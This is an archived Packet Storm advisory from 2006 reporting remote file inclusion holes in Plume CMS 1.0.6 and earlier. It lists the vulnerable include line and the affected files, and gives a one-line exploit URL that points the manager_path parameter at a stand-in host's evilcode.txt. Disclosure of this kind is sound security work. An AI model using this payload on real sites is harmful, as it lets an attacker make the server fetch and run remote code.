plume-1.0.6.txt

2006-08-27T00:00:00
ID PACKETSTORM:49411
Type packetstorm
Reporter Vagner Rodrigues Fernandes
Modified 2006-08-27T00:00:00

Description

                                        
                                            `Plume CMS Multiple Remote File Include Vulnerabilities  
Vulnerable Versions: Plume CMS <= 1.0.6  
Vendor: Plume CMS http://plume-cms.net  
  
-Vulnerable Code  
include $_PX_config['manager_path'].'/directory/_file.php';  
  
-Files Affected  
./articles.php  
./categories.php  
./index.php  
./news.php  
./prefs.php  
./sites.php  
./subtypes.php  
./users.php  
./xmedia.php  
./frontinc/class.template.php  
./frontinc/prepend.php  
./inc/lib.text.php  
./install/index.php  
./install/upgrade.php  
./tools/htaccess/index.php  
  
-Exploit  
http://www.example.com/path/index.php?_PX_config[manager_path]=http://host/evilcode.txt?  
  
-Credits  
Vagner Rodrigues Fernandes (BugReport)  
vagner.rodrigues@gmail.com  
`